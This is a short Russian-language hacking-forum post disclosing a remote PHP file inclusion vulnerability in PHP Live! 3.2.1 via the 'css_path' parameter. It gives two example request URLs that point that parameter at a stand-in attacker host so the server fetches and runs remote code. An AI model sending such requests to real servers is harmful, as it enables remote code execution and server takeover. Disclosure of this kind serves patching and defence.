• XSS.stack #1 – первый литературный журнал от юзеров форума

Web PHP Live! 3.2.1 - php include

DeeIP

HDD-drive
Пользователь
Регистрация
22.04.2006
Сообщения
35
Реакции
0
PHP-инклюдинг в PHP Live
Уязвимый продукт: PHP Live! 3.2.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "css_path" в сценариях help.php и setup/header.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:

Код:
help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker
[mod][Ŧ1LAN:] прежде чем постить смотрим правила. пока без минуса.[/mod]
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх